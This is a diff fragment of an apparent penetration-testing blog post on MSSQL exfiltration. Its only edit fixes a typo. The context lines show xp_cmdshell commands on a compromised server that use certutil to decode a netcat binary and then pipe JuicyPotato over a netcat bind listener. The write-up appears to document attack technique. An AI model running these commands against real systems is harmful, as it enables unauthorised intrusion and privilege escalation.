ricardojoserf/ricardojoserf.github.io/_posts/2021-9-14-mssql-exfiltration.md

 xp_cmdshell certutil -decode c:\windows\tasks\nc.txt c:\windows\tasks\nc.exe
 ```

-Luckily, after uploading this file I realized that there was not any antivirus in the machine and the Windows firewall was disabled, so it was as easy as uploading the file using bind shells insted of reverse shells.
+Luckily, after uploading this file I realized that there was not any antivirus in the machine and the Windows firewall was disabled, so it was as easy as uploading the file using bind shells instead of reverse shells.
 So in the compromised server the command was:

 ```
 xp_cmdshell c:\windows\tasks\nc.exe -lvp 8888 > c:\windows\tasks\juicypotato.exe